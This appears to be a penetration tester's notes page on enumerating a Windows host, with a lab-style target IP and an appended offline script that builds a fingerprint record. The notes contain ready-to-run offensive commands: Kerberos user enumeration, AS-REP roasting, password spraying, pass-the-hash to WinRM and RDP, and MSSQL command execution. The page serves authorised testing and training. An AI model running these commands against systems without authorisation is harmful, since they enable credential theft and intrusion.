Recon & Enum


External enumeration against a Windows target. Service deep-dives overlap with Service Enum, but Windows hosts expose a different set of ports, so the order of checks differs.

T=10.10.11.50

i. Port scan, Windows fingerprint

nmap -p- --min-rate 10000 -T4 -Pn -n -oG fast.gnmap "$T"
PORTS=$(grep -oP '\d+/open' fast.gnmap | cut -d/ -f1 | paste -sd,)
nmap -p"$PORTS" -sCV -Pn -n -oA full "$T"

Ports that suggest Windows:

  • 88 Kerberos -> Domain Controller, see AD MOC
  • 135 MSRPC endpoint mapper
  • 139, 445 SMB / NetBIOS
  • 389, 636, 3268, 3269 LDAP / Global Catalog -> DC
  • 464 kpasswd -> DC
  • 593 RPC over HTTP
  • 3389 RDP
  • 5985, 5986 WinRM (HTTP, HTTPS)
  • 47001 WinRM HTTP listener
  • 49152-65535 RPC dynamic range

DC vs member server: 88 + 389 + 445 + 53 open -> almost certainly a DC.

ii. SMB (139, 445)

The most useful single port on Windows. Full SMB depth in Service Enum -> SMB.

nxc smb "$T"
nxc smb "$T" --shares -u '' -p ''
nxc smb "$T" --users -u '' -p ''
enum4linux-ng -A "$T"

Anonymous share access (rare on modern Win, common on legacy):

smbclient -L "//$T" -N
smbclient "//$T/IPC$" -N

Vuln scripts worth running once:

nmap -p445 --script="smb-vuln-*" "$T"

Hostname and domain leak from SMB

Even without creds, nxc smb "$T" returns hostname, OS build and domain. Record them; you'll need them for Kerberos and LDAP.

iii. LDAP (389, 636)

Full enum in LDAP. First touch:

nxc ldap "$T"
ldapsearch -x -H "ldap://$T" -s base namingcontexts

If anonymous bind works, dump the directory.

iv. Kerberos (88)

User enum without creds, the easy win on Insane boxes:

kerbrute userenum -d corp.local --dc "$T" /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Once you have valid usernames, AS-REP roast (no creds needed for asreproastable users, i.e. accounts with Kerberos pre-authentication disabled):

impacket-GetNPUsers corp.local/ -dc-ip "$T" -usersfile users.txt -format hashcat -outputfile asrep.hash

Password spray:

kerbrute passwordspray -d corp.local --dc "$T" users.txt 'Winter2024!'

v. WinRM (5985, 5986)

nxc winrm "$T" -u "$USER" -p "$PASS"

Login with creds, full PowerShell remoting:

evil-winrm -i "$T" -u "$USER" -p "$PASS"
## hash auth (PtH for WinRM):
evil-winrm -i "$T" -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c'

vi. RDP (3389)

nxc rdp "$T" -u "$USER" -p "$PASS"
nmap -p3389 --script="rdp-enum-encryption,rdp-vuln-ms12-020" "$T"
xfreerdp /v:"$T" /u:"$USER" /p:"$PASS" /dynamic-resolution /drive:share,/tmp

Pass-the-hash to RDP (if Restricted Admin Mode is on):

xfreerdp /v:"$T" /u:Administrator /pth:8846f7eaee8fb117ad06bdd830b7586c /restricted-admin

NLA disabled = screenshot the login screen for username hints:

nmap -p3389 --script rdp-screenshot "$T"

vii. MSSQL (1433)

nxc mssql "$T" -u "$USER" -p "$PASS"
nxc mssql "$T" -u "$USER" -p "$PASS" --local-auth
nxc mssql "$T" -u "$USER" -p "$PASS" -x "whoami"

Hash capture via xp_dirtree, see Service Enum -> MSSQL.

viii. WMI / WMIC (over RPC)

Remote query if you have creds:

nxc wmi "$T" -u "$USER" -p "$PASS"
impacket-wmiquery "corp.local/$USER:$PASS@$T"
## opens an interactive WQL> prompt; run e.g. SELECT * FROM Win32_OperatingSystem

ix. IIS and other HTTP fingerprints

curl -sI "http://$T"
curl -sI "https://$T"
## Server: Microsoft-IIS/X.Y  -> IIS version reveals OS:
## IIS 7.0 = Server 2008
## IIS 7.5 = Server 2008 R2 / Win7
## IIS 8.0 = Server 2012 / Win8
## IIS 8.5 = Server 2012 R2 / Win8.1
## IIS 10.0 = Server 2016+ / Win10+

Common Windows web tech to look for in Web MOC:

  • ASP.NET (.aspx, __VIEWSTATE)
  • SharePoint (/_layouts/, /_vti_bin/)
  • Exchange OWA (/owa/, /ecp/)
  • IIS short name disclosure (/anything*~1*/.aspx)

x. Exchange-specific

If Exchange is exposed (OWA, ECP, MAPI, EWS, Autodiscover), the foothold may be a Microsoft CVE. Quick checks:

## ProxyShell / ProxyLogon / ProxyNotShell detection
nxc smb "$T" -M exchange
nmap --script http-vuln-cve2021-26855 -p443 "$T"
curl -s "https://$T/owa/" -k -I
curl -s "https://$T/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" -k

xi. Save the fingerprint

After enum, you should know:

  • Windows version / build / SP
  • Hostname and FQDN
  • Domain name and DC name
  • Open ports and services
  • Any usernames discovered (via SMB, RDP screenshot, kerbrute)
  • Any creds tested (even failures help spray planning)

Then jump to Initial Access for foothold patterns (web, SMB, RDP brute, Kerberos abuse) and AD MOC if the host is domain-joined.
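Added example, not part of these notes or of any tool named above: a small shell script that turns the raw recon output into the fingerprint record this section asks for. It parses nmap -oG output (section i), applies the DC heuristic from section i, maps the IIS Server header to the OS family listed in section ix, lists which management channels are exposed, and prints the fields from the checklist above. The gnmap text and HTTP headers are constructed samples in the formats nmap and curl -sI produce; the IP, hostname and domain are placeholders; the role labels (domain-controller, dc-likely, windows-member, unknown) are names chosen here, not tool output.

```shell
#!/bin/sh
# Added example: build the section xi fingerprint record from recon output.
# All inputs below are constructed; nothing here contacts a host.

# Constructed nmap -oG text for one host (placeholder IP).
SAMPLE_GNMAP='Host: 10.10.11.50 ()  Status: Up
Host: 10.10.11.50 ()  Ports: 53/open/tcp//domain///, 88/open/tcp//kerberos-sec///, 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 5985/open/tcp//http///, 49667/open/tcp//msrpc///  Ignored State: filtered (65527)'

# Constructed response headers in the shape curl -sI returns from IIS.
SAMPLE_HEADERS='HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET'

# open_ports GNMAP_TEXT: print open TCP ports, comma-separated, ascending.
open_ports() {
    printf '%s\n' "$1" | grep -o '[0-9]*/open/tcp' | cut -d/ -f1 | sort -n | paste -sd, -
}

# has_port PORTS PORT: succeed if PORT is in the comma-separated list PORTS.
has_port() {
    case ",$1," in *",$2,"*) return 0 ;; esac
    return 1
}

# infer_role PORTS: the section i heuristic. 53 + 88 + 389 + 445 open is
# almost certainly a domain controller; 88 or 389 alone still points at a DC;
# 445 or 135 alone is a Windows member host.
infer_role() {
    ports=$1
    if has_port "$ports" 53 && has_port "$ports" 88 && has_port "$ports" 389 && has_port "$ports" 445; then
        echo "domain-controller"
    elif has_port "$ports" 88 || has_port "$ports" 389; then
        echo "dc-likely"
    elif has_port "$ports" 445 || has_port "$ports" 135; then
        echo "windows-member"
    else
        echo "unknown"
    fi
}

# remote_mgmt PORTS: which management channels (sections v-viii) are exposed.
remote_mgmt() {
    ports=$1; out=""
    has_port "$ports" 5985 && out="$out winrm-http"
    has_port "$ports" 5986 && out="$out winrm-https"
    has_port "$ports" 3389 && out="$out rdp"
    has_port "$ports" 135  && out="$out wmi-rpc"
    has_port "$ports" 1433 && out="$out mssql"
    echo "${out# }"
}

# iis_to_os HEADERS: map the Server header to the OS family from section ix.
# A non-IIS or missing Server header yields "not-iis".
iis_to_os() {
    ver=$(printf '%s\n' "$1" | tr -d '\r' \
          | sed -n 's/^[Ss]erver: Microsoft-IIS\/\([0-9.]*\).*/\1/p' | head -n1)
    case "$ver" in
        7.0)  echo "Server 2008" ;;
        7.5)  echo "Server 2008 R2 / Win7" ;;
        8.0)  echo "Server 2012 / Win8" ;;
        8.5)  echo "Server 2012 R2 / Win8.1" ;;
        10.0) echo "Server 2016+ / Win10+" ;;
        "")   echo "not-iis" ;;
        *)    echo "IIS $ver (unmapped)" ;;
    esac
}

# write_fingerprint GNMAP HEADERS HOSTNAME DOMAIN: print the checklist record.
# Hostname and domain are whatever SMB enum returned; placeholders here.
write_fingerprint() {
    gnmap=$1; headers=$2; hostname=$3; domain=$4
    ports=$(open_ports "$gnmap")
    printf 'open_ports: %s\n'   "$ports"
    printf 'role: %s\n'         "$(infer_role "$ports")"
    printf 'remote_mgmt: %s\n'  "$(remote_mgmt "$ports")"
    printf 'iis_os_hint: %s\n'  "$(iis_to_os "$headers")"
    printf 'hostname: %s\n'     "$hostname"
    printf 'domain: %s\n'       "$domain"
}

# Usage with the constructed samples (placeholder hostname and domain):
write_fingerprint "$SAMPLE_GNMAP" "$SAMPLE_HEADERS" "DC01" "corp.local"
```

In practice, pass the contents of fast.gnmap and the curl -sI output to write_fingerprint and append its lines to the engagement notes; the role line is a heuristic, so confirm it against what nxc smb reports before relying on it.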